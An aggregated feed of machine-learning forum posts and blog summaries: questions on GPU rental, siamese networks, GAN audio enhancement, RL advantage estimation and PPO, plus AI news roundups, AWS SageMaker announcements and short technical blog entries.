An increasingly important building block of large scale machine learning systems is based on returning slates: ordered lists of items given a query. Applications of this technology include search, information retrieval, and recommender systems. When the action space is large, decision systems are restricted to a particular structure to complete online queries quickly. This paper addresses the optimization of these large scale decision systems given an arbitrary reward function. We cast this learning problem in a policy optimization framework and propose a new class of policies, born from a novel relaxation of decision functions. This results in a simple, yet efficient learning algorithm that scales to massive action spaces. We compare our method to the commonly adopted Plackett-Luce policy class and demonstrate the effectiveness of our approach on problems with action space sizes in the order of millions.  ( 2 min )

  • Open

    [D] GPU/Machine on-demand rental that runs Windows 10+ as host OS? (I know, I know...)
    Anyone know of a cloud service renting on-demand GPU instances (RTX 4090 preferably) that run Windows 10 or newer? Believe me, I know... I rent on-demand instances from vast.ai for Linux and have been exceedingly happy with their services. I've also used paperspace in the past with good success. Unfortunately, we are in need of RTX 4090s (or roughly equivalent performing Tesla cards) that run on a host OS of Windows 10+ (Server/Win11/etc all fine) because a lot of the modeling software in the industry I work in runs on Windows-only, which is absurd, but nevertheless the truth. The fastest I can find are A6000s on paperspace which won't cut the mustard. At the moment we have a 3090 and a bunch of 3070s on-prem which are doing OK but the RTX 4090 is simply much much better, and unsurprisingly the Windows-only software is also not coded in a way that takes advantage of multiple GPUs all that well either. Thanks for any help or referrals provided, I really appreciate it. (Have checked paperspace, vastai, runpod, and a few other smaller ones to no avail) submitted by /u/kyleboddy [link] [comments]  ( 9 min )
    [D] How do I improve performance?
    Hello everyone. I am new to this sub so please go easy on me lol. I want to implement a neural net that recognizes whether an object in an image matches one of a set of objects with limited training data. I already have worked on a siamese network implementation with triplet loss and ResNet, but I am not getting great performance. Should I do something else? For extra info, there are roughly 300 objects/classes and around 7 images per object (most are augmented images) submitted by /u/Nearby_Ad_5644 [link] [comments]  ( 8 min )
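For reference, the triplet objective you're training is just a hinge on squared embedding distances; a minimal pure-Python sketch (toy 2-D vectors, margin value is an assumption):

```python
def sq_dist(u, v):
    return sum((a - b) ** 2 for a, b in zip(u, v))

def triplet_loss(anchor, positive, negative, margin=0.2):
    """Hinge triplet loss: pull the anchor toward a same-class positive and
    push it at least `margin` further from a different-class negative."""
    return max(sq_dist(anchor, positive) - sq_dist(anchor, negative) + margin, 0.0)

a, p, n = [1.0, 0.0], [0.9, 0.1], [-1.0, 0.0]
easy = triplet_loss(a, p, n)   # constraint already satisfied -> zero loss
hard = triplet_loss(a, n, p)   # violated triplet -> positive loss, drives learning
```

With only ~7 images per class, how you pick triplets usually matters more than the backbone: random triplets are mostly "easy" (zero loss, no gradient), so semi-hard or batch-hard negative mining, plus margin tuning, is a common first thing to try before changing architectures.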
    [R] Learning to Model the World with Language - UC Berkeley 2023 - Dynalang an agent that learns a multimodal world model that predicts future text and image representations and learns to act from imagined model rollouts!
    Paper: https://arxiv.org/abs/2308.01399 Github: https://github.com/jlin816/dynalang Code coming soon! Abstract: To interact with humans in the world, agents need to understand the diverse types of language that people use, relate them to the visual world, and act based on them. While current agents learn to execute simple language instructions from task rewards, we aim to build agents that leverage diverse language that conveys general knowledge, describes the state of the world, provides interactive feedback, and more. Our key idea is that language helps agents predict the future: what will be observed, how the world will behave, and which situations will be rewarded. This perspective unifies language understanding with future prediction as a powerful self-supervised learning object…  ( 9 min )
    [P] I created ScoreCast, a tool to predict the outcome of football games in minor football leagues.
https://preview.redd.it/p70yknwm15gb1.png?width=1901&format=png&auto=webp&s=7417914304cc23d6691653cd73396bd600a44b0a Hey Guys, I am happy to share with you a web application I've been working on for the past couple of weeks. It's a tool to predict the outcome of soccer games in minor football leagues. Named ScoreCast, it predicts the outcome of soccer games in six minor leagues: Serie A Brazil, Serie B Brazil, Primera Division Argentina, J1 League Japan, Eliteserien Norway, and Veikkausliiga Finland. Since I am really interested in football analytics and couldn't find many online tools for predicting outcomes in minor soccer leagues, I created ScoreCast as a guidance tool in this field. If you want to check it out, here are some links that might help: Github: https://github.com/Costasgk/ScoreCast The App: https://score-cast-3a6cb8fe5c50.herokuapp.com/ Medium: https://medium.com/@costascg9/scorecast-a-tool-for-predicting-football-game-outcomes-in-minor-leagues-666f7acca3a Thank you for your time! submitted by /u/Costas_8 [link] [comments]  ( 9 min )
    [P] Struggling with Audio Enhancement using GANs - Any Suggestions?
I'm working on a Python project that aims to transform phone-quality acoustic guitar recordings into studio-like ones. My approach involves using a Generative Adversarial Network (GAN) with two components: a Generator and a Discriminator. Here's a quick rundown of my process: Data Loading & Preprocessing: Convert acoustic guitar recordings to spectrograms and split into training and validation sets. Generator: Neural network trained to create high-quality studio recording spectrograms from low-quality inputs. Discriminator: Another neural network trained to differentiate between real and generator-created high-quality spectrograms. Training: Train the Generator and Discriminator against each other in a cat-and-mouse game of deception and detection. Audio Enhancement: Feed the Generator a low-quality spectrogram, get a high-quality one out, and convert it back into an audio file. I'm reaching out because I'm not entirely satisfied with the quality of the output. The enhanced audio is just rhythmic noise, what am I missing when generating the audio? I'm wondering if anyone here has experience with GANs for audio enhancement and can offer some advice. Is there something I might be missing in my approach? Are there any tips or tricks you've found helpful in your own work? And yes, I'm prepared for you to tear me a new one. Bring on the constructive criticism! git repo: https://github.com/Gabeiscool420/AURAL_GAN-predictive_model/blob/main/requirements.txt submitted by /u/S0UNDSAGE [link] [comments]  ( 9 min )
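For orientation, the two losses in that cat-and-mouse game are just binary cross-entropies on the discriminator's outputs; a minimal scalar sketch (stdlib only, not your actual training code):

```python
import math

def d_loss(d_real: float, d_fake: float) -> float:
    """Discriminator binary cross-entropy: push D(real) -> 1, D(G(z)) -> 0."""
    return -(math.log(d_real) + math.log(1.0 - d_fake))

def g_loss(d_fake: float) -> float:
    """Non-saturating generator loss: reward fooling the discriminator."""
    return -math.log(d_fake)
```

On the "rhythmic noise" symptom specifically: a common cause is inverting magnitude-only spectrograms back to audio with the phase discarded. If that matches your pipeline, phase reconstruction (Griffin-Lim) or a neural vocoder at the reconstruction step often helps far more than changing the GAN itself.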
    [D] Parametric Development
    I wanted to share with you an approach to software development that I've been exploring recently: Parametric Development. This involves using artificial intelligence (AI) models, including GPT-like models, BART-like models, and other specialized transformer models, to assist in writing, debugging, and documenting code. My journey with programming is a bit unconventional. I took one year of computer science at university and learned how to write "Hello, World!" in TurboPascal from an old university textbook in late primary school. That was the extent of my programming experience until about a month ago. Since then, I've been using AI models to write code for my ideas, as I don't have extensive programming skills. These AI models have written and debugged every single line of code in my pro…  ( 9 min )
    [D] CIKM 23 Notification
    Today is the day of paper notification according to the CFP. Has anyone received the notification? submitted by /u/Alliswell2257 [link] [comments]  ( 8 min )
    [Discussion] Automated unstructured -> structured OSS library - give me your requirements
Hey folks, I'm a data engineer in the traditional space for over 10 years. I am working on a library for easy transitioning of unstructured to structured data. The use case is that I would regularly build a ton of python pipelines but without schema management, they would be a pain to maintain. 2y ago I started working on this library https://pypi.org/project/dlt/, and now it's ready to help people like myself to load json to db/parquet/iceberg with a 1-liner with schema evolution. Declarative loading possible. I am looking for the following feedback - What would make this more useful in the ML space? Specific destinations? Are the docs usable or do you expect something different? let me know what. For example, we are adding Weaviate vector db and Athena + Iceberg in the next weeks. - any features you are missing? or any ideas that you think would be helpful? - are the docs relatable, understandable? what are you missing? docs are here, you can find colab demos under getting started: https://dlthub.com/docs/intro submitted by /u/Thinker_Assignment [link] [comments]  ( 9 min )
    [D] Validate my approach to do Unsupervised Fine tuning of Code LLMs like CodeT5+ and Starcoder with custom code base
Any suggestions on how to prepare code data to fine-tune a code LLM in an unsupervised way, or is it even possible? For example: Task: Code summarisation with custom code base (with no summaries) Let's assume that this code base is unique and a pre-trained model is giving unsatisfactory results. Now to fine-tune there are three options, 1. Manually prepare summaries for a portion of the code and fine-tune 2. Find a similar code base which has the labels (docstrings) and fine-tune 3. Mask some portions of the code randomly and give as input, and the output will be the masked portions Options 1 and 2 don't seem feasible for a production environment. The reasoning behind option 3 is that with no labels available, the model will learn the patterns in the code base and provide a better summarisation with its pre-trained knowledge. I tried option 3 with CodeT5+ fine-tuning. The format of input and output was as follows. Input: `def __init__(self, text, font): self._text = text self._font = font def get_text(self): || def set_text(self, value): self._text = value` Output: `return self._text` submitted by /u/dire_wolf_cookie [link] [comments]  ( 9 min )
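Option 3 can be sketched as a tiny preprocessing function. This is a toy whitespace-token version — a real pipeline would use the model's own tokenizer, and the `<extra_id_0>` sentinel below follows the T5-style convention the CodeT5 family inherits:

```python
import random

MASK = "<extra_id_0>"  # T5-style sentinel token

def make_masked_pair(code: str, span_frac: float = 0.15, seed: int = 0):
    """Mask one contiguous span of tokens: the masked code is the model
    input, and the removed span is the training target."""
    rng = random.Random(seed)
    tokens = code.split()
    span_len = max(1, int(len(tokens) * span_frac))
    start = rng.randrange(len(tokens) - span_len + 1)
    target = " ".join(tokens[start:start + span_len])
    masked = " ".join(tokens[:start] + [MASK] + tokens[start + span_len:])
    return masked, target

masked, target = make_masked_pair("def get_text ( self ) : return self . _text")
```

Substituting the target back in place of the sentinel reconstructs the original code, which is the invariant span-corruption training relies on.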
    [Project] Enquiry for individuals working with Natural Language Processing
Hello Everyone. I'm Harsha, a final-year Master's student in Berlin, currently pursuing my thesis. For my thesis "Natural Language Processing in Data Transfer Across Documents in the Commodity Trading Industry" I am searching for professionals currently working with NLP in companies who can lend me 10 minutes of their time for a personal interview. THIS WOULD BE A LOT HELPFUL. Please do let me know. Thanks in advance submitted by /u/Aimerforlife [link] [comments]  ( 8 min )
    [D] Why is tflite c++ so hard to compile?
Has anyone actually done this and can dm me? I am trying to include the interpreter to run inference with a simple c++ program and a custom trained model. But I cannot figure out how to update include paths and cannot see any resources online. submitted by /u/Agreeable_Fee477 [link] [comments]  ( 8 min )
    From Sparse to Soft Mixtures of Experts [R]
    submitted by /u/we_are_mammals [link] [comments]  ( 8 min )
    [D] Why is it so hard to rent GPU time?
    I'm just a new guy, so take it easy please :) - Is it just because I'm just signing up for the cloud compute services? Will this get easier? I have a 3090 so I can do quite a bit in my home office, but my clients need some larger models now, and I've been trying to pay for instances with an A100 at least. It's been really a lot of push-back...is this normal? What can I do to get access to larger GPUs sooner? I have tried paperspace, aws, googlecloud, llambda, linode...would love to know some other services or tools you folks use to get work done. Thank you for your time. Interested to hear how you spin up high VRAM environments for projects. submitted by /u/UrbanSuburbaKnight [link] [comments]  ( 9 min )
    [D] milvus search filtering based on string
While doing vector search on embeddings I wanted to apply a filter based on a column value in Milvus. As Milvus supports boolean expressions to apply the filter (hybrid search), can someone help me with a boolean expression snippet which will apply the filter based on a string value of a field? Ex. I'm doing vector search on the field "context" and need to filter the results based on a specific "filename" string value to further filter and improve the results. I'm using Milvus 2.2 submitted by /u/adiraat [link] [comments]  ( 8 min )
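A scalar filter in Milvus is just a boolean expression string passed alongside the vector search. A minimal sketch — the helper builds and escapes the expression, and the commented pymilvus call reflects the 2.2-era API as I understand it (collection, field names, and index params are assumptions, not from the post):

```python
def filename_filter(filename: str) -> str:
    """Build a Milvus boolean-expression string matching a VARCHAR field.
    Double quotes inside the value are escaped so the expression stays valid."""
    escaped = filename.replace('"', '\\"')
    return f'filename == "{escaped}"'

# Hypothetical usage with pymilvus:
# results = collection.search(
#     data=[query_embedding],
#     anns_field="context",
#     param={"metric_type": "L2", "params": {"nprobe": 10}},
#     limit=5,
#     expr=filename_filter("report_2023.pdf"),
#     output_fields=["filename"],
# )
```

Note the filtered field must exist as a scalar (e.g. VARCHAR) field in the collection schema; the `expr` string can also combine conditions with `and`/`or`/`in`.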
    [R] Proof of Lemma 5.1 in 'Bayesian Design Principles for Frequentist Sequential Learning'
This paper won the ICML 2023 outstanding paper award; its idea is really interesting and I want to follow the details. Lemma 5.1 paves the way towards the core theoretical results, but the paper does not provide a formal proof. I do not have a deep background in game theory; maybe the proof is obvious to professionals. https://preview.redd.it/ih6u3wiyr0gb1.png?width=464&format=png&auto=webp&s=cc895b9701e3600213825c34ef3b542f53d65233 I understand this lemma tries to construct a Nash equilibrium upon the additional assumption of strong convexity, but why is this maximin solution a Nash equilibrium? I'd appreciate it if someone could provide a hint. submitted by /u/Kyeon-G [link] [comments]  ( 9 min )
    [D] Any notable work regarding the effect of a language model's vocabulary or tokenizer?
    Hi. I'm trying to build a text encoder for a specific domain and want to know what sort of papers are out there that I should take note of. I may be wrong, but it seems that ever since LLMs started taking over, the choice of tokenizer has become trivial and therefore doesn't warrant much discussion. One paper that I remember reading a while ago discussed the effect of using a custom-made vocabulary for the biomedical domain (Pretrained Language Models for Biomedical and Clinical Tasks: Understanding and Extending the State-of-the-Art (Lewis et al., 2020)). Are there any other works that I should take note of? Open to any suggestions. submitted by /u/Seankala [link] [comments]  ( 9 min )
    [R] Scaling Relationship on Learning Mathematical Reasoning with Large Language Models - Zheng Yuan et al Alibaba Damo Academy
    Scaling Relationship on Learning Mathematical Reasoning with Large Language Models Paper: https://arxiv.org/abs/2308.01825 GitHub: https://github.com/OFA-Sys/gsm8k-ScRel Abstract: Mathematical reasoning is a challenging task for large language models (LLMs), while its scaling relationship with respect to LLM capacity is under-explored. In this paper, we investigate how the pre-training loss, supervised data amount, and augmented data amount influence the reasoning performance of a supervised LLM. We find that pre-training loss is a better indicator of the model's performance than the model's parameter count. We apply supervised fine-tuning (SFT) with different amounts of supervised data and empirically find a log-linear relation between data amount and model performance, and we find better models improve less with enlarged supervised datasets. To augment more data samples for improving model performance without any human effort, we propose to apply Rejection sampling Fine-Tuning (RFT). RFT uses supervised models to generate and collect correct reasoning paths as augmented fine-tuning datasets. We find that with augmented samples containing more distinct reasoning paths, RFT improves mathematical reasoning performance more for LLMs. We also find RFT brings more improvement for less performant LLMs. Furthermore, we combine rejection samples from multiple models, which pushes LLaMA-7B to an accuracy of 49.3% and significantly outperforms the supervised fine-tuning (SFT) accuracy of 35.9%. Head figure: pre-training loss vs. SFT and ICL. submitted by /u/GanjinZero0 [link] [comments]  ( 9 min )
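The RFT data-collection step from the abstract can be sketched as a toy simulation; the stand-in "model", the problems, and the acceptance rate below are my own inventions, not the paper's code:

```python
import random

# Toy RFT data step: sample k candidate solutions per problem from a
# supervised model, keep only those whose final answer is correct, and
# deduplicate distinct reasoning paths for the augmented fine-tuning set.
random.seed(0)

PATHS = ["direct sum", "sum via decomposition", "sum via number line"]

def fake_model_sample(problem):
    # stand-in for an SFT model: returns a (reasoning_path, answer) pair,
    # correct roughly 60% of the time
    path = random.choice(PATHS)
    answer = problem["gold"] if random.random() < 0.6 else problem["gold"] + 1
    return path, answer

problems = [{"q": "2+3", "gold": 5}, {"q": "7+4", "gold": 11}]
augmented = []
for p in problems:
    kept = set()
    for _ in range(8):                  # k = 8 samples per problem
        path, ans = fake_model_sample(p)
        if ans == p["gold"]:            # rejection step: keep correct answers
            kept.add(path)              # a set keeps only *distinct* paths
    augmented.extend((p["q"], path) for path in sorted(kept))
print(augmented)
```

The paper's observation that more distinct reasoning paths help corresponds to the deduplicated `kept` set growing with more diverse correct samples.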

    Understanding the concept of Variance in Reinforcement Learning
    I was trying to understand Generalized Advantage Estimation from here and came across a paragraph about the advantage estimators. I understood the reason why there could be high bias while bootstrapping the advantage. But why does $A_t^{(\infty)}$ have high variance? Aren't bias and variance concepts related to estimation by an estimator? While calculating $A_t^{(\infty)}$, we are literally using the reward values obtained from the environment, and therefore there is no estimation involved. Could someone please help me with this? submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
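One way to see the variance: even though each reward is "real", the sampled return differs from trajectory to trajectory, so the Monte-Carlo advantage is still a random variable. A quick numpy sketch (my own toy setup, not from the GAE paper) comparing the spread of the one-step estimate against the Monte-Carlo estimate:

```python
import numpy as np

# Toy setup: rewards are i.i.d. noisy draws and the value function is taken
# to be exactly 0, so both estimators are unbiased here and we can look
# purely at their spread across sampled trajectories.
rng = np.random.default_rng(0)
gamma, T, n_trajectories = 0.99, 50, 2000

def one_step_adv(rewards, v=0.0):
    # A_t^(1) = r_t + gamma * V(s_{t+1}) - V(s_t): a single noisy reward term
    return rewards[0] + gamma * v - v

def mc_adv(rewards, v=0.0):
    # A_t^(inf) = sum_l gamma^l * r_{t+l} - V(s_t): sums T noisy reward terms
    return float(np.sum(gamma ** np.arange(len(rewards)) * rewards)) - v

std_1 = np.std([one_step_adv(rng.normal(0, 1, T)) for _ in range(n_trajectories)])
std_inf = np.std([mc_adv(rng.normal(0, 1, T)) for _ in range(n_trajectories)])
print(std_1, std_inf)  # the Monte-Carlo estimate is several times noisier
```

Because the Monte-Carlo estimate sums many noisy reward terms, its spread across trajectories is much larger, which is exactly the "high variance" the paragraph refers to.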
    Interesting RL environments in github
    I am searching for an interesting but not too complex game env. Preferably with self-play, but it should be neither very simple nor standard Atari-like. Any recommendations? submitted by /u/Trrrrr88 [link] [comments]  ( 8 min )
    Updating custom output layers of an LSTM network
    I have a text generation task learning to predict the next word with an LSTM network with multiple output layers. After the generation of a sentence has finished, I calculate a reward for the whole sentence and try to update the output layers that participated in the generation (contributing layers get the calculated reward value, others get 0). My problem is that even if I update only the selected output layers, it seems that other layers' weights get updated instead. I have a minimized example with dummy data to present the problem:

    import random
    import numpy as np
    import tensorflow as tf
    from keras.layers import Input, LSTM, Dense, Embedding
    from keras.utils import pad_sequences
    from tensorflow.keras.models import Model

    def policy_gradient_loss(y_true, y_pred):
        return tf.reduce_mean(tf.m…  ( 9 min )
    Why am I unable to reshape my observation with `TransformObservation` wrapper?
    I am trying to reshape my `Breakout` vectorized environment observations to have the shape `num_envs*frames, height, width, channels`. Currently, the shape is `(3, 4, 210, 160, 3)` and basically I'd like it to be `(3*4, 210, 160, 3)`. Based on the documentation, the `TransformObservation` wrapper should solve this problem for me, but it is not doing that. Here's my code:

    import gym
    import numpy as np
    from gym.wrappers import AtariPreprocessing, FrameStack, GrayScaleObservation, TransformObservation

    if __name__ == '__main__':
        def reshape_image(obs):
            # Assuming the original observation is an image with shape (height, width, channels)
            new_obs = np.array(obs).reshape(12, 210, 160, 3)
            return new_obs

        env = gym.vector.make("ALE/Breakout-v5", num_envs=4)
        env = FrameStack(env, num_stack=3)
        env = TransformObservation(env, reshape_image)
        env.reset()
        observation, reward, terminated, done = env.step(env.action_space.sample())
        print("observation = ", env.observation_space.shape)

    submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )

    One-Minute Daily AI News 8/4/2023
    AI.com Now Belongs to Elon Musk. The URL previously belonged to OpenAI, but, somehow, it’s now a landing page for Musk’s AI venture.[1] Samsung, Hyundai back AI startup Tenstorrent: Everyone wants competition to Nvidia, says CEO Keller.[2] Google’s AI-powered Search Generative Experience is getting a big new feature: images and video. If you’ve enabled the AI-based SGE feature in Search Labs, you’ll now start to see more multimedia in the colorful summary box at the top of your search results.[3] White Castle wants to roll out AI-enabled voices to over 100 drive-thrus by 2024 in the hope that people can get their sliders faster with maybe less arguing with someone over speakers.[4] BushAICave.com Sources: [1] https://gizmodo.com/ai-dot-com-now-belongs-to-elon-musk-1850707248 [2] https://www.zdnet.com/google-amp/article/samsung-hyundai-back-ai-startup-tenstorrent-everyone-wants-competition-to-nvidia-says-ceo-keller/ [3] https://www.theverge.com/2023/8/2/23817107/google-ai-search-generative-experience-videos-links [4] https://www.theverge.com/2023/8/2/23817406/white-castle-soundhound-ai-sliders submitted by /u/Excellent-Target-847 [link] [comments]  ( 8 min )
    Is the singularity a net good or a net bad?
    I am curious whether people consider a singularity event to be a net positive or a net negative? Are you "pro" or "con"? Please explain your reasoning. submitted by /u/kecepa5669 [link] [comments]  ( 8 min )
    Comparing Vicuna to alternative LLMs like ChatGPT, LLaMA, and Alpaca
    I wrote an in-depth article exploring Vicuna as an alternative to competitor LLMs like ChatGPT, Alpaca, and LLaMA for chat applications. I based it on the research data on the LMSYS.org website and the GitHub repo for the project. Key findings: Vicuna achieves over 90% of ChatGPT's conversational quality based on benchmarks, despite being smaller in size. It significantly outperforms other open models like LLaMA and Alpaca. Vicuna is freely available for non-commercial use under a research license. For startups and developers, Vicuna provides a decent open-source alternative to proprietary conversational AI. It shows the potential of transfer learning from foundation models like LLaMA. Overall, Vicuna represents a promising development in democratizing access to leading conversational intelligence through its high performance, permissive licensing, and open availability. You can read the full article here. I also publish all these articles in a weekly email if you prefer to get them that way. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News and Insights In an innovative clinical trial, researchers at Feinstein Institutes successfully implanted a microchip in a paralyzed man's brain and developed AI algorithms to re-establish the connection between his brain and body. This neural bypass restored movement and sensations in his hand, arm, and wrist, marking the first electronic reconnection of a paralyzed individual's brain, body, and spinal cord [Details]. IBM's watsonx.ai geospatial foundation model – built from NASA's satellite data – will be openly available on Hugging Face. It will be the largest geospatial foundation model on Hugging Face and the first-ever open-source AI foundation model built in collaboration with NASA [Details]. Go…  ( 10 min )
    Should I continue for a PhD after I get an accelerated masters if I want to get into AI?
    My main goal isn't just the data science / machine learning part of AI, but more the Computer Vision, Robotics, NLP, and, I guess, research-oriented aspects of AI. If I want to pursue that versus DS, should I also get a PhD? Many jobs I've been looking at seem to require a PhD as a prereq, while some don't even mention it. submitted by /u/davididp [link] [comments]  ( 8 min )
    Review my book of AI Self Portraits
    I'm looking for reviewers for my book of AI Self Portraits that's about to come out on Amazon on the 21st. AI journalist Elle Farrell-Kingsley said: “This collection of AI self-portraits is truly intriguing . . . a must-read for anyone curious about the intersection of art and artificial intelligence.” Send me a DM and I'll send you the whole thing. If you're well known (or should be) I might put what you have to say on the back cover! submitted by /u/KarneyHatch [link] [comments]  ( 8 min )
    ElevenLabs TTS (paid/free)
    I'm seeking a text-to-speech solution that provides quality output comparable to ElevenLabs presets. While I'm open to a base-rate payment, I find ElevenLabs' character limit frustrating. It's important that the solution is user-friendly. Additionally, I have a PC with a 1070 Ti, as I read that running such programs could require a GPU. Please recommend a suitable substitute. submitted by /u/Ainz-Ol-Gon [link] [comments]  ( 8 min )
    Top 20 Artificial Intelligence AI Companies In The World
    submitted by /u/Techasoft16 [link] [comments]  ( 8 min )
    (Very) Roughly estimating the singularity date
    www.daystosingularity.com is a (very) rough estimation of the remaining time before technology reaches a pivotal moment when our civilization undergoes a profound transformation due to the exponential growth of technology and the emergence of superintelligent machines that improve themselves. Although the Singularity is not predicted to happen on a specific date, all at once, the estimated date can be seen as the center of a Gaussian bell curve of the estimate, with that center designated as the possible date that future historians will mark as the beginning of a new historical period. The Technological Singularity poses risks that include the emergence of superintelligent AI outpacing human control, loss of control over AI's actions and behavior, unintended consequences of advanced AI systems, massive job displacement, wealth inequality, existential risks like human extinction, ethical concerns, dependency on technology, and a decline in human skills and abilities due to excessive reliance on AI. Not funny. We use the definition of technological singularity. This milestone is predicted to occur after AGI (Artificial General Intelligence) is reached. Please check our definitions and methodology here. Predicting the singularity is challenging and uncertain, and current estimates should be viewed cautiously. The estimated date is continuously updated. We weigh a curated list of relevant expert predictions and contributing factors on when the singularity will take place. Any suggestion for improving the method is highly appreciated. submitted by /u/Powerful-Pumpkin-938 [link] [comments]  ( 9 min )

    Software and the Allee effect
    The Allee effect is named after Warder Clyde Allee who added a term to the famous logistic equation. His added term is highlighted in blue. Here N is the population of a species over time, r is the intrinsic rate of increase, K is the carrying capacity, and A is the critical point. If you […] Software and the Allee effect first appeared on John D. Cook.  ( 5 min )
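One common way to write the model with Allee's extra term is $dN/dt = rN(1 - N/K)(N/A - 1)$; a few lines of Python can probe its behaviour around the critical point (parameter values below are arbitrary illustrations, not from the post):

```python
def dN_dt(N, r=0.5, K=100.0, A=10.0):
    # logistic growth multiplied by the Allee factor (N/A - 1):
    # below the critical point A the growth rate turns negative
    return r * N * (1 - N / K) * (N / A - 1)

print(dN_dt(5.0))    # below the critical point A: growth is negative
print(dN_dt(50.0))   # between A and K: growth is positive
print(dN_dt(100.0))  # at carrying capacity K: growth is zero
```

This is what distinguishes the Allee model from plain logistic growth: small populations below A collapse instead of recovering.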
    Solved problems becoming unsolved
    “That’s a solved problem. So nobody knows how to solve it anymore.” Once a problem is deemed “solved” interest in the problem plummets. “Solved” problems may not be fully solved, but sufficiently solved that the problem is no longer fashionable. Practical issues remain, but interest moves elsewhere. The software written for the problem slowly decays. […] Solved problems becoming unsolved first appeared on John D. Cook.  ( 5 min )
    The cobbler’s son
    There’s an old saying “The cobbler’s son has no shoes.” It’s generally taken to mean that we can neglect to do for ourselves something we do for other people. I’ve been writing a few scripts for my personal use, things I’ve long intended to do but only recently got around to doing. I said something […] The cobbler’s son first appeared on John D. Cook.  ( 5 min )

    Optimize data preparation with new features in AWS SageMaker Data Wrangler
    Data preparation is a critical step in any data-driven project, and having the right tools can greatly enhance operational efficiency. Amazon SageMaker Data Wrangler reduces the time it takes to aggregate and prepare tabular and image data for machine learning (ML) from weeks to minutes. With SageMaker Data Wrangler, you can simplify the process of […]  ( 10 min )
    Index your Alfresco content using the new Amazon Kendra Alfresco connector
    Amazon Kendra is a highly accurate and simple-to-use intelligent search service powered by machine learning (ML). Amazon Kendra offers a suite of data source connectors to simplify the process of ingesting and indexing your content, wherever it resides. Valuable data in organizations is stored in both structured and unstructured repositories. An enterprise search solution should […]  ( 13 min )
    Use the Amazon SageMaker and Salesforce Data Cloud integration to power your Salesforce apps with AI/ML
    This post is co-authored by Daryl Martis, Director of Product, Salesforce Einstein AI. This is the second post in a series discussing the integration of Salesforce Data Cloud and Amazon SageMaker. In Part 1, we show how the Salesforce Data Cloud and Einstein Studio integration with SageMaker allows businesses to access their Salesforce data securely […]  ( 13 min )
    Bring your own AI using Amazon SageMaker with Salesforce Data Cloud
    This post is co-authored by Daryl Martis, Director of Product, Salesforce Einstein AI. We’re excited to announce Amazon SageMaker and Salesforce Data Cloud integration. With this capability, businesses can access their Salesforce data securely with a zero-copy approach using SageMaker and use SageMaker tools to build, train, and deploy AI models. The inference endpoints are […]  ( 7 min )

    AI’s transformative role in software testing and debugging
    AI has revolutionized software development, transforming testing and debugging by automating mundane tasks and solving complex problems: manual testing no longer demands the same hours and resources, and code quality and development time have improved. This article explores AI's profound impact on software testing and debugging, including its benefits, risks, and how it… Read More »AI's transformative role in software testing and debugging The post AI's transformative role in software testing and debugging appeared first on Data Science Central.  ( 23 min )
    Generative AI megatrends: implications of GPT-4 drift and open source models – part one
    In this two-part discussion, we will cover two related generative AI megatrends. Background: A recent paper, How Is ChatGPT's Behavior Changing over Time?, from Stanford University and UC Berkeley claims that the performance of GPT-4 has drifted over time. To make this claim, specific tasks were evaluated (ex: accuracy of maths) and the results… Read More »Generative AI megatrends: implications of GPT-4 drift and open source models – part one The post Generative AI megatrends: implications of GPT-4 drift and open source models – part one appeared first on Data Science Central.  ( 19 min )

    Baby onesie designs
    A reader wrote in a while ago with a suggestion: they were about to have a baby and wondered if I could use AI to come up with some new ideas for baby onesies. I can't find the letter any more, and I don't remember how  ( 6 min )
    Bonus: more baby onesie ideas
    AI Weirdness: the strange side of machine learning  ( 2 min )

    NVIDIA CEO Jensen Huang Returns to SIGGRAPH
    One pandemic and one generative AI revolution later, NVIDIA founder and CEO Jensen Huang returns to the SIGGRAPH stage next week to deliver a live keynote at the world’s largest professional graphics conference. The address, slated for Tuesday, Aug. 8, at 8 a.m. PT in Los Angeles, will feature an exclusive look at some of Read article >  ( 4 min )


    "Skill-it! A Data-Driven Skills Framework for Understanding and Training Language Models", Chen et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    How do I add Entropy to a PPO algorithm?
    Can someone please help with this question? I have added my understanding of this problem to the question, but I suspect that it may be flawed. submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
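For context, the usual recipe, sketched here in plain numpy rather than any particular RL library, is to subtract a small entropy bonus from the PPO objective so the optimizer is rewarded for keeping the policy distribution spread out:

```python
import numpy as np

def softmax(logits):
    z = logits - logits.max(axis=-1, keepdims=True)
    e = np.exp(z)
    return e / e.sum(axis=-1, keepdims=True)

def entropy(probs):
    # Shannon entropy per row; high when the policy is close to uniform
    return -np.sum(probs * np.log(probs + 1e-12), axis=-1)

# two policy outputs over 3 actions: one peaked, one uniform
probs = softmax(np.array([[4.0, 0.1, 0.1], [0.5, 0.5, 0.5]]))

ent_coef = 0.01              # typical small coefficient
surrogate_loss = 0.42        # placeholder for the clipped PPO surrogate
total_loss = surrogate_loss - ent_coef * entropy(probs).mean()
print(total_loss < surrogate_loss)  # True: the entropy bonus lowers the loss
```

The `surrogate_loss` placeholder stands in for the clipped PPO objective; the key point is only the sign and scale of the entropy term.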
    How to get better at programming when I have BP disorder and on ADHD spectrum?
    Hi, I am 30F, currently working on my thesis. I like the idea of creating logic and then implementing it in code. I switched my major from engineering to CS because I was very much inspired by AI and all. But the issue is I have bipolar disorder and I am also on the ADHD spectrum, so self-paced online courses to learn programming are very hard for me. I am also barely managing to pay tuition, so I can't pay $100+ for a course. I know it's kinda stupid, but is there any way I can make my programming skills better and get better at creating/modifying algorithms? submitted by /u/Kucing_koyangi [link] [comments]  ( 9 min )

    What would be the initial costs of developing a text-to-video AI? What would the quality of this AI be?
    I was wondering if this would be super expensive or not. The cost to develop GPT-3 was about $4 million according to some resources online. Would the cost to develop the first version of a text-to-video AI be the same, around $5M? Does this figure include the salaries of the employees, or is $5M just the amount used to train the AI? Any answer is appreciated. Thanks in advance. submitted by /u/Claud1ao [link] [comments]  ( 8 min )
    Creating point cloud videos from arbitrary RGB videos
    submitted by /u/berkanzzzz [link] [comments]  ( 8 min )
    what source would you recommend a 15yo to learn how to make a simple neural network?
